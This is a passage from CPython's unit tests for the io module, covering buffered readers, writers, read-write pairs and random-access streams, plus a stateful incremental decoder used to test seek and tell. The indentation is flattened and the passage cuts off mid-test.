self.assertRaises(self.UnsupportedOperation, bufio.truncate, 0)
class CBufferedReaderTest(BufferedReaderTest, SizeofTest):
tp = io.BufferedReader
@unittest.skipIf(MEMORY_SANITIZER or ADDRESS_SANITIZER, "sanitizer defaults to crashing "
"instead of returning NULL for malloc failure.")
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2 GiB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.read)
def test_misbehaved_io_read(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
# _pyio.BufferedReader seems to implement reading different, so that
# checking this is not so easy.
self.assertRaises(OSError, bufio.read, 10)
def test_garbage_collection(self):
# C BufferedReader objects are collected.
# The Python version has __del__, so it ends into gc.garbage instead
self.addCleanup(support.unlink, support.TESTFN)
with support.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedReader"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedReaderTest(BufferedReaderTest):
tp = pyio.BufferedReader
class BufferedWriterTest(unittest.TestCase, CommonBufferedTests):
write_mode = "wb"
def test_constructor(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(3, bufio.write(b"abc"))
bufio.flush()
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
bufio.__init__(rawio)
self.assertEqual(3, bufio.write(b"ghi"))
bufio.flush()
self.assertEqual(b"".join(rawio._write_stack), b"abcghi")
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.write, b'')
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.write(b''), 0)
def test_detach_flush(self):
raw = self.MockRawIO()
buf = self.tp(raw)
buf.write(b"howdy!")
self.assertFalse(raw._write_stack)
buf.detach()
self.assertEqual(raw._write_stack, [b"howdy!"])
def test_write(self):
# Write to the buffered IO but don't overflow the buffer.
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
self.assertFalse(writer._write_stack)
buffer = bytearray(b"def")
bufio.write(buffer)
buffer[:] = b"***" # Overwrite our copy of the data
bufio.flush()
self.assertEqual(b"".join(writer._write_stack), b"abcdef")
def test_write_overflow(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
contents = b"abcdefghijklmnop"
for n in range(0, len(contents), 3):
bufio.write(contents[n:n+3])
flushed = b"".join(writer._write_stack)
# At least (total - 8) bytes were implicitly flushed, perhaps more
# depending on the implementation.
self.assertTrue(flushed.startswith(contents[:-8]), flushed)
def check_writes(self, intermediate_func):
# Lots of writes, test the flushed output is as expected.
contents = bytes(range(256)) * 1000
n = 0
writer = self.MockRawIO()
bufio = self.tp(writer, 13)
# Generator of write sizes: repeat each N 15 times then proceed to N+1
def gen_sizes():
for size in count(1):
for i in range(15):
yield size
sizes = gen_sizes()
while n < len(contents):
size = min(next(sizes), len(contents) - n)
self.assertEqual(bufio.write(contents[n:n+size]), size)
intermediate_func(bufio)
n += size
bufio.flush()
self.assertEqual(contents, b"".join(writer._write_stack))
def test_writes(self):
self.check_writes(lambda bufio: None)
def test_writes_and_flushes(self):
self.check_writes(lambda bufio: bufio.flush())
def test_writes_and_seeks(self):
def _seekabs(bufio):
pos = bufio.tell()
bufio.seek(pos + 1, 0)
bufio.seek(pos - 1, 0)
bufio.seek(pos, 0)
self.check_writes(_seekabs)
def _seekrel(bufio):
pos = bufio.seek(0, 1)
bufio.seek(+1, 1)
bufio.seek(-1, 1)
bufio.seek(pos, 0)
self.check_writes(_seekrel)
def test_writes_and_truncates(self):
self.check_writes(lambda bufio: bufio.truncate(bufio.tell()))
def test_write_non_blocking(self):
raw = self.MockNonBlockWriterIO()
bufio = self.tp(raw, 8)
self.assertEqual(bufio.write(b"abcd"), 4)
self.assertEqual(bufio.write(b"efghi"), 5)
# 1 byte will be written, the rest will be buffered
raw.block_on(b"k")
self.assertEqual(bufio.write(b"jklmn"), 5)
# 8 bytes will be written, 8 will be buffered and the rest will be lost
raw.block_on(b"0")
try:
bufio.write(b"opqrwxyz0123456789")
except self.BlockingIOError as e:
written = e.characters_written
else:
self.fail("BlockingIOError should have been raised")
self.assertEqual(written, 16)
self.assertEqual(raw.pop_written(),
b"abcdefghijklmnopqrwxyz")
self.assertEqual(bufio.write(b"ABCDEFGHI"), 9)
s = raw.pop_written()
# Previously buffered bytes were flushed
self.assertTrue(s.startswith(b"01234567A"), s)
def test_write_and_rewind(self):
raw = io.BytesIO()
bufio = self.tp(raw, 4)
self.assertEqual(bufio.write(b"abcdef"), 6)
self.assertEqual(bufio.tell(), 6)
bufio.seek(0, 0)
self.assertEqual(bufio.write(b"XY"), 2)
bufio.seek(6, 0)
self.assertEqual(raw.getvalue(), b"XYcdef")
self.assertEqual(bufio.write(b"123456"), 6)
bufio.flush()
self.assertEqual(raw.getvalue(), b"XYcdef123456")
def test_flush(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
bufio.flush()
self.assertEqual(b"abc", writer._write_stack[0])
def test_writelines(self):
l = [b'ab', b'cd', b'ef']
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_userlist(self):
l = UserList([b'ab', b'cd', b'ef'])
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_error(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
self.assertRaises(TypeError, bufio.writelines, [1, 2, 3])
self.assertRaises(TypeError, bufio.writelines, None)
self.assertRaises(TypeError, bufio.writelines, 'abc')
def test_destructor(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
del bufio
support.gc_collect()
self.assertEqual(b"abc", writer._write_stack[0])
def test_truncate(self):
# Truncate implicitly flushes the buffer.
self.addCleanup(support.unlink, support.TESTFN)
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
bufio.write(b"abcdef")
self.assertEqual(bufio.truncate(3), 3)
self.assertEqual(bufio.tell(), 6)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.read(), b"abc")
def test_truncate_after_write(self):
# Ensure that truncate preserves the file position after
# writes longer than the buffer size.
# Issue: https://bugs.python.org/issue32228
self.addCleanup(support.unlink, support.TESTFN)
with self.open(support.TESTFN, "wb") as f:
# Fill with some buffer
f.write(b'\x00' * 10000)
buffer_sizes = [8192, 4096, 200]
for buffer_size in buffer_sizes:
with self.open(support.TESTFN, "r+b", buffering=buffer_size) as f:
f.write(b'\x00' * (buffer_size + 1))
# After write write_pos and write_end are set to 0
f.read(1)
# read operation makes sure that pos != raw_pos
f.truncate()
self.assertEqual(f.tell(), buffer_size + 2)
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes from many threads and test they were
# all flushed.
N = 1000
contents = bytes(range(256)) * N
sizes = cycle([1, 19])
n = 0
queue = deque()
while n < len(contents):
size = next(sizes)
queue.append(contents[n:n+size])
n += size
del contents
# We use a real file object because it allows us to
# exercise situations where the GIL is released before
# writing the buffer to the raw streams. This is in addition
# to concurrency issues due to switching threads in the middle
# of Python code.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
def f():
try:
while True:
try:
s = queue.popleft()
except IndexError:
return
bufio.write(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with support.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
bufio.close()
with self.open(support.TESTFN, "rb") as f:
s = f.read()
for i in range(256):
self.assertEqual(s.count(bytes([i])), N)
finally:
support.unlink(support.TESTFN)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO()
bufio = self.tp(rawio, 5)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
self.assertRaises(OSError, bufio.write, b"abcdef")
# Silence destructor error
bufio.close = lambda: None
def test_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), 8, 12)
def test_write_error_on_close(self):
raw = self.MockRawIO()
def bad_write(b):
raise OSError()
raw.write = bad_write
b = self.tp(raw)
b.write(b'spam')
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
def test_slow_close_from_thread(self):
# Issue #31976
rawio = self.SlowFlushRawIO()
bufio = self.tp(rawio, 8)
t = threading.Thread(target=bufio.close)
t.start()
rawio.in_flush.wait()
self.assertRaises(ValueError, bufio.write, b'spam')
self.assertTrue(bufio.closed)
t.join()
class CBufferedWriterTest(BufferedWriterTest, SizeofTest):
tp = io.BufferedWriter
@unittest.skipIf(MEMORY_SANITIZER or ADDRESS_SANITIZER, "sanitizer defaults to crashing "
"instead of returning NULL for malloc failure.")
def test_constructor(self):
BufferedWriterTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2 GiB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.write, b"def")
def test_garbage_collection(self):
# C BufferedWriter objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends into gc.garbage instead
self.addCleanup(support.unlink, support.TESTFN)
with support.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.write(b"123xxx")
f.x = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertIsNone(wr(), wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"123xxx")
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedWriter"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedWriterTest(BufferedWriterTest):
tp = pyio.BufferedWriter
class BufferedRWPairTest(unittest.TestCase):
def test_constructor(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
def test_uninitialized(self):
pair = self.tp.__new__(self.tp)
del pair
pair = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.read, 0)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.write, b'')
pair.__init__(self.MockRawIO(), self.MockRawIO())
self.assertEqual(pair.read(0), b'')
self.assertEqual(pair.write(b''), 0)
def test_detach(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertRaises(self.UnsupportedOperation, pair.detach)
def test_constructor_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), self.MockRawIO(), 8, 12)
def test_constructor_with_not_readable(self):
class NotReadable(MockRawIO):
def readable(self):
return False
self.assertRaises(OSError, self.tp, NotReadable(), self.MockRawIO())
def test_constructor_with_not_writeable(self):
class NotWriteable(MockRawIO):
def writable(self):
return False
self.assertRaises(OSError, self.tp, self.MockRawIO(), NotWriteable())
def test_read(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read(3), b"abc")
self.assertEqual(pair.read(1), b"d")
self.assertEqual(pair.read(), b"ef")
pair = self.tp(self.BytesIO(b"abc"), self.MockRawIO())
self.assertEqual(pair.read(None), b"abc")
def test_readlines(self):
pair = lambda: self.tp(self.BytesIO(b"abc\ndef\nh"), self.MockRawIO())
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(5), [b"abc\n", b"def\n"])
def test_read1(self):
# .read1() is delegated to the underlying reader object, so this test
# can be shallow.
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read1(3), b"abc")
self.assertEqual(pair.read1(), b"def")
def test_readinto(self):
for method in ("readinto", "readinto1"):
with self.subTest(method):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
data = byteslike(b'\0' * 5)
self.assertEqual(getattr(pair, method)(data), 5)
self.assertEqual(bytes(data), b"abcde")
def test_write(self):
w = self.MockRawIO()
pair = self.tp(self.MockRawIO(), w)
pair.write(b"abc")
pair.flush()
buffer = bytearray(b"def")
pair.write(buffer)
buffer[:] = b"***" # Overwrite our copy of the data
pair.flush()
self.assertEqual(w._write_stack, [b"abc", b"def"])
def test_peek(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertTrue(pair.peek(3).startswith(b"abc"))
self.assertEqual(pair.read(3), b"abc")
def test_readable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.readable())
def test_writeable(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertTrue(pair.writable())
def test_seekable(self):
# BufferedRWPairs are never seekable, even if their readers and writers
# are.
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.seekable())
# .flush() is delegated to the underlying writer object and has been
# tested in the test_write method.
def test_close_and_closed(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
pair.close()
self.assertTrue(pair.closed)
def test_reader_close_error_on_close(self):
def reader_close():
reader_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertTrue(pair.closed)
self.assertFalse(reader.closed)
self.assertTrue(writer.closed)
# Silence destructor error
reader.close = lambda: None
def test_writer_close_error_on_close(self):
def writer_close():
writer_non_existing
reader = self.MockRawIO()
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('writer_non_existing', str(err.exception))
self.assertFalse(pair.closed)
self.assertTrue(reader.closed)
self.assertFalse(writer.closed)
# Silence destructor error
writer.close = lambda: None
writer = None
# Ignore BufferedWriter (of the BufferedRWPair) unraisable exception
with support.catch_unraisable_exception():
# Ignore BufferedRWPair unraisable exception
with support.catch_unraisable_exception():
pair = None
support.gc_collect()
support.gc_collect()
def test_reader_writer_close_error_on_close(self):
def reader_close():
reader_non_existing
def writer_close():
writer_non_existing
reader = self.MockRawIO()
reader.close = reader_close
writer = self.MockRawIO()
writer.close = writer_close
pair = self.tp(reader, writer)
with self.assertRaises(NameError) as err:
pair.close()
self.assertIn('reader_non_existing', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('writer_non_existing', str(err.exception.__context__))
self.assertFalse(pair.closed)
self.assertFalse(reader.closed)
self.assertFalse(writer.closed)
# Silence destructor error
reader.close = lambda: None
writer.close = lambda: None
with support.catch_unraisable_exception():
# Ignore BufferedRWPair unraisable exception
pair = None
support.gc_collect()
def test_isatty(self):
class SelectableIsAtty(MockRawIO):
def __init__(self, isatty):
MockRawIO.__init__(self)
self._isatty = isatty
def isatty(self):
return self._isatty
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(False))
self.assertFalse(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(False))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(False), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
pair = self.tp(SelectableIsAtty(True), SelectableIsAtty(True))
self.assertTrue(pair.isatty())
def test_weakref_clearing(self):
brw = self.tp(self.MockRawIO(), self.MockRawIO())
ref = weakref.ref(brw)
brw = None
ref = None # Shouldn't segfault.
class CBufferedRWPairTest(BufferedRWPairTest):
tp = io.BufferedRWPair
class PyBufferedRWPairTest(BufferedRWPairTest):
tp = pyio.BufferedRWPair
class BufferedRandomTest(BufferedReaderTest, BufferedWriterTest):
read_mode = "rb+"
write_mode = "wb+"
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
BufferedWriterTest.test_constructor(self)
def test_uninitialized(self):
BufferedReaderTest.test_uninitialized(self)
BufferedWriterTest.test_uninitialized(self)
def test_read_and_write(self):
raw = self.MockRawIO((b"asdf", b"ghjk"))
rw = self.tp(raw, 8)
self.assertEqual(b"as", rw.read(2))
rw.write(b"ddd")
rw.write(b"eee")
self.assertFalse(raw._write_stack) # Buffer writes
self.assertEqual(b"ghjk", rw.read())
self.assertEqual(b"dddeee", raw._write_stack[0])
def test_seek_and_tell(self):
raw = self.BytesIO(b"asdfghjkl")
rw = self.tp(raw)
self.assertEqual(b"as", rw.read(2))
self.assertEqual(2, rw.tell())
rw.seek(0, 0)
self.assertEqual(b"asdf", rw.read(4))
rw.write(b"123f")
rw.seek(0, 0)
self.assertEqual(b"asdf123fl", rw.read())
self.assertEqual(9, rw.tell())
rw.seek(-4, 2)
self.assertEqual(5, rw.tell())
rw.seek(2, 1)
self.assertEqual(7, rw.tell())
self.assertEqual(b"fl", rw.read(11))
rw.flush()
self.assertEqual(b"asdf123fl", raw.getvalue())
self.assertRaises(TypeError, rw.seek, 0.0)
def check_flush_and_read(self, read_func):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
self.assertEqual(b"ab", read_func(bufio, 2))
bufio.write(b"12")
self.assertEqual(b"ef", read_func(bufio, 2))
self.assertEqual(6, bufio.tell())
bufio.flush()
self.assertEqual(6, bufio.tell())
self.assertEqual(b"ghi", read_func(bufio))
raw.seek(0, 0)
raw.write(b"XYZ")
# flush() resets the read buffer
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"XYZ", read_func(bufio, 3))
def test_flush_and_read(self):
self.check_flush_and_read(lambda bufio, *args: bufio.read(*args))
def test_flush_and_readinto(self):
def _readinto(bufio, n=-1):
b = bytearray(n if n >= 0 else 9999)
n = bufio.readinto(b)
return bytes(b[:n])
self.check_flush_and_read(_readinto)
def test_flush_and_peek(self):
def _peek(bufio, n=-1):
# This relies on the fact that the buffer can contain the whole
# raw stream, otherwise peek() can return less.
b = bufio.peek(n)
if n != -1:
b = b[:n]
bufio.seek(len(b), 1)
return b
self.check_flush_and_read(_peek)
def test_flush_and_write(self):
raw = self.BytesIO(b"abcdefghi")
bufio = self.tp(raw)
bufio.write(b"123")
bufio.flush()
bufio.write(b"45")
bufio.flush()
bufio.seek(0, 0)
self.assertEqual(b"12345fghi", raw.getvalue())
self.assertEqual(b"12345fghi", bufio.read())
def test_threads(self):
BufferedReaderTest.test_threads(self)
BufferedWriterTest.test_threads(self)
def test_writes_and_peek(self):
def _peek(bufio):
bufio.peek(1)
self.check_writes(_peek)
def _peek(bufio):
pos = bufio.tell()
bufio.seek(-1, 1)
bufio.peek(1)
bufio.seek(pos, 0)
self.check_writes(_peek)
def test_writes_and_reads(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.read(1)
self.check_writes(_read)
def test_writes_and_read1s(self):
def _read1(bufio):
bufio.seek(-1, 1)
bufio.read1(1)
self.check_writes(_read1)
def test_writes_and_readintos(self):
def _read(bufio):
bufio.seek(-1, 1)
bufio.readinto(bytearray(1))
self.check_writes(_read)
def test_write_after_readahead(self):
# Issue #6629: writing after the buffer was filled by readahead should
# first rewind the raw stream.
for overwrite_size in [1, 5]:
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 4)
# Trigger readahead
self.assertEqual(bufio.read(1), b"A")
self.assertEqual(bufio.tell(), 1)
# Overwriting should rewind the raw stream if it needs so
bufio.write(b"B" * overwrite_size)
self.assertEqual(bufio.tell(), overwrite_size + 1)
# If the write size was smaller than the buffer size, flush() and
# check that rewind happens.
bufio.flush()
self.assertEqual(bufio.tell(), overwrite_size + 1)
s = raw.getvalue()
self.assertEqual(s,
b"A" + b"B" * overwrite_size + b"A" * (9 - overwrite_size))
def test_write_rewind_write(self):
# Various combinations of reading / writing / seeking backwards / writing again
def mutate(bufio, pos1, pos2):
assert pos2 >= pos1
# Fill the buffer
bufio.seek(pos1)
bufio.read(pos2 - pos1)
bufio.write(b'\x02')
# This writes earlier than the previous write, but still inside
# the buffer.
bufio.seek(pos1)
bufio.write(b'\x01')
b = b"\x80\x81\x82\x83\x84"
for i in range(0, len(b)):
for j in range(i, len(b)):
raw = self.BytesIO(b)
bufio = self.tp(raw, 100)
mutate(bufio, i, j)
bufio.flush()
expected = bytearray(b)
expected[j] = 2
expected[i] = 1
self.assertEqual(raw.getvalue(), expected,
"failed result for i=%d, j=%d" % (i, j))
def test_truncate_after_read_or_write(self):
raw = self.BytesIO(b"A" * 10)
bufio = self.tp(raw, 100)
self.assertEqual(bufio.read(2), b"AA") # the read buffer gets filled
self.assertEqual(bufio.truncate(), 2)
self.assertEqual(bufio.write(b"BB"), 2) # the write buffer increases
self.assertEqual(bufio.truncate(), 4)
def test_misbehaved_io(self):
BufferedReaderTest.test_misbehaved_io(self)
BufferedWriterTest.test_misbehaved_io(self)
def test_interleaved_read_write(self):
# Test for issue #12213
with self.BytesIO(b'abcdefgh') as raw:
with self.tp(raw, 100) as f:
f.write(b"1")
self.assertEqual(f.read(1), b'b')
f.write(b'2')
self.assertEqual(f.read1(1), b'd')
f.write(b'3')
buf = bytearray(1)
f.readinto(buf)
self.assertEqual(buf, b'f')
f.write(b'4')
self.assertEqual(f.peek(1), b'h')
f.flush()
self.assertEqual(raw.getvalue(), b'1b2d3f4h')
with self.BytesIO(b'abc') as raw:
with self.tp(raw, 100) as f:
self.assertEqual(f.read(1), b'a')
f.write(b"2")
self.assertEqual(f.read(1), b'c')
f.flush()
self.assertEqual(raw.getvalue(), b'a2c')
def test_interleaved_readline_write(self):
with self.BytesIO(b'ab\ncdef\ng\n') as raw:
with self.tp(raw) as f:
f.write(b'1')
self.assertEqual(f.readline(), b'b\n')
f.write(b'2')
self.assertEqual(f.readline(), b'def\n')
f.write(b'3')
self.assertEqual(f.readline(), b'\n')
f.flush()
self.assertEqual(raw.getvalue(), b'1b\n2def\n3\n')
# You can't construct a BufferedRandom over a non-seekable stream.
test_unseekable = None
# writable() returns True, so there's no point to test it over
# a writable stream.
test_truncate_on_read_only = None
class CBufferedRandomTest(BufferedRandomTest, SizeofTest):
tp = io.BufferedRandom
@unittest.skipIf(MEMORY_SANITIZER or ADDRESS_SANITIZER, "sanitizer defaults to crashing "
"instead of returning NULL for malloc failure.")
def test_constructor(self):
BufferedRandomTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2 GiB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_garbage_collection(self):
CBufferedReaderTest.test_garbage_collection(self)
CBufferedWriterTest.test_garbage_collection(self)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedRandom"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedRandomTest(BufferedRandomTest):
tp = pyio.BufferedRandom
# To fully exercise seek/tell, the StatefulIncrementalDecoder has these
# properties:
# - A single output character can correspond to many bytes of input.
# - The number of input bytes to complete the character can be
# undetermined until the last input byte is received.
# - The number of input bytes can vary depending on previous input.
# - A single input byte can correspond to many characters of output.
# - The number of output characters can be undetermined until the
# last input byte is received.
# - The number of output characters can vary depending on previous input.
class StatefulIncrementalDecoder(codecs.IncrementalDecoder):
"""
For testing seek/tell behavior with a stateful, buffering decoder.
Input is a sequence of words. Words may be fixed-length (length set
by input) or variable-length (period-terminated). In variable-length
mode, extra periods are ignored. Possible words are:
- 'i' followed by a number sets the input length, I (maximum 99).
When I is set to 0, words are space-terminated.
- 'o' followed by a number sets the output length, O (maximum 99).
- Any other word is converted into a word followed by a period on
the output. The output word consists of the input word truncated
or padded out with hyphens to make its length equal to O. If O
is 0, the word is output verbatim without truncating or padding.
I and O are initially set to 1. When I changes, any buffered input is
re-scanned according to the new I. EOF also terminates the last word.
"""
def __init__(self, errors='strict'):
codecs.IncrementalDecoder.__init__(self, errors)
self.reset()
def __repr__(self):
return '<SID %x>' % id(self)
def reset(self):
self.i = 1
self.o = 1
self.buffer = bytearray()
def getstate(self):
i, o = self.i ^ 1, self.o ^ 1 # so that flags = 0 after reset()
return bytes(self.buffer), i*100 + o
def setstate(self, state):
buffer, io = state
self.buffer = bytearray(buffer)
i, o = divmod(io, 100)
self.i, self.o = i ^ 1, o ^ 1
def decode(self, input, final=False):
output = ''
for b in input:
if self.i == 0: # variable-length, terminated with period
if b == ord('.'):
if self.buffer:
output += self.process_word()
else:
self.buffer.append(b)
else: # fixed-length, terminate after self.i bytes
self.buffer.append(b)
if len(self.buffer) == self.i:
output += self.process_word()
if final and self.buffer: # EOF terminates the last word
output += self.process_word()
return output
def process_word(self):
output = ''
if self.buffer[0] == ord('i'):
self.i = min(99, int(self.buffer[1:] or 0)) # set input length
elif self.buffer[0] == ord('o'):
self.o = min(99, int(self.buffer[1:] or 0)) # set output length
else:
output = self.buffer.decode('ascii')
if len(output) < self.o:
output += '-'*self.o # pad out with hyphens
if self.o:
output = output[:self.o] # truncate to output length
output += '.'
self.buffer = bytearray()
return output
codecEnabled = False
@classmethod
def lookupTestDecoder(cls, name):
if cls.codecEnabled and name == 'test_decoder':
latin1 = codecs.lookup('latin-1')
return codecs.CodecInfo(
name='test_decoder', encode=latin1.encode, decode=None,
incrementalencoder=None,
streamreader=None, streamwriter=None,
incrementaldecoder=cls)
# Register the previous decoder for testing.
# Disabled by default, tests will enable it.
codecs.register(StatefulIncrementalDecoder.lookupTestDecoder)
class StatefulIncrementalDecoderTest(unittest.TestCase):
"""
Make sure the StatefulIncrementalDecoder actually works.
"""
test_cases = [
# I=1, O=1 (fixed-length input == fixed-length output)
(b'abcd', False, 'a.b.c.d.'),
# I=0, O=0 (variable-length input, variable-length output)
(b'oiabcd', True, 'abcd.'),
# I=0, O=0 (should ignore extra periods)
(b'oi...abcd...', True, 'abcd.'),
# I=0, O=6 (variable-length input, fixed-length output)
(b'i.o6.x.xyz.toolongtofit.', False, 'x-----.xyz---.toolon.'),
# I=2, O=6 (fixed-length input < fixed-length output)
(b'i.i2.o6xyz', True, 'xy----.z-----.'),
# I=6, O=3 (fixed-length input > fixed-length output)
(b'i.o3.i6.abcdefghijklmnop', True, 'abc.ghi.mno.'),
# I=0, then 3; O=29, then 15 (with longer output)
(b'i.o29.a.b.cde.o15.abcdefghijabcdefghij.i3.a.b.c.d.ei00k.l.m', True,
'a----------------------------.' +
'b----------------------------.' +
'cde--------------------------.' +
'abcdefghijabcde.' +
'a.b------------.' +
'.c.------------.' +
'd.e------------.' +
'k--------------.' +
'l--------------.' +
'm--------------.')
]
def test_decoder(self):
# Try a few one-shot test cases.
for input, eof, output in self.test_cases:
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(input, eof), output)
# Also test an unfinished decode, followed by forcing EOF.
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(b'oiabcd'), '')
self.assertEqual(d.decode(b'', 1), 'abcd.')
class TextIOWrapperTest(unittest.TestCase):
def setUp(self):
self.testdata = b"AAA\r\nBBB\rCCC\r\nDDD\nEEE\r\n"
self.normalized = b"AAA\nBBB\nCCC\nDDD\nEEE\n".decode("ascii")
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def test_constructor(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
t.__init__(b, encoding="latin-1", newline="\r\n")
self.assertEqual(t.encoding, "latin-1")
self.assertEqual(t.line_buffering, False)
t.__init__(b, encoding="utf-8", line_buffering=True)
self.assertEqual(t.encoding, "utf-8")
self.assertEqual(t.line_buffering, True)
self.assertEqual("\xe9\n", t.readline())
self.assertRaises(TypeError, t.__init__, b, newline=42)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
def test_uninitialized(self):
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
del t
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
self.assertRaisesRegex((ValueError, AttributeError),
